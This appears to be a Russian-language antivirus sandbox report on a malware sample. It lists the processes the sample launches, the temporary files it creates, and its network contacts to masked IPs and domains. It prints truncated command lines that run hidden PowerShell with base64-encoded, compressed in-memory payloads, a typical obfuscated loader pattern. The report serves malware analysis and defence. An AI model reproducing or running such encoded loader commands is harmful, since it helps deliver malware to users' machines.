Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c powershell "'powershell ""$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAAAAAAAA/3yP0W7qMAxAf8VSKyURtNy+EkB337HtIQ0uzUidLHEpqOq/T1Roj3u0ZR2f041k2QWCQ5HQo8lYnOAtxugf8j1zcnT...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1428
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\error022040_01.xml
- %TEMP%\cmd1307.bat
- %TEMP%\824090.cvr
Сетевая активность
TCP
Другие
- '34.##9.100.209':443
UDP
- DNS ASK sg##fl.com
- DNS ASK is##o.net
Другое
Запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "'powershell ""$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAAAAAAAA/3yP0W7qMAxAf8VSKyURtNy+EkB337HtIQ0uzUidLHEpqOq/T1Roj3u0ZR2f041k2QWCQ5HQo8lYnOAtxugf8j1zcnT5hBJt36i5ZGebY...
- '<SYSTEM32>\cmd.exe' /c %TEMP%\cmd1307.bat
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('H4sIAAAAAAAA/3yP0W7qMAxAf8VSKyURtNy+EkB337HtIQ0uzUidLHEpqOq/T1Roj3u0ZR2f041k2QWCQ5HQo8lYnOAtxugf8j1zcnT5hBJt36i5ZGebY6M5PWZJOFWh/ULL...
- '<SYSTEM32>\cmd.exe' /c powershell "'powershell ""$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAAAAAAAA/3yP0W7qMAxAf8VSKyURtNy+EkB337HtIQ0uzUidLHEpqOq/T1Roj3u0ZR2f041k2QWCQ5HQo8lYnOAtxugf8j1zcnT... (со скрытым окном)
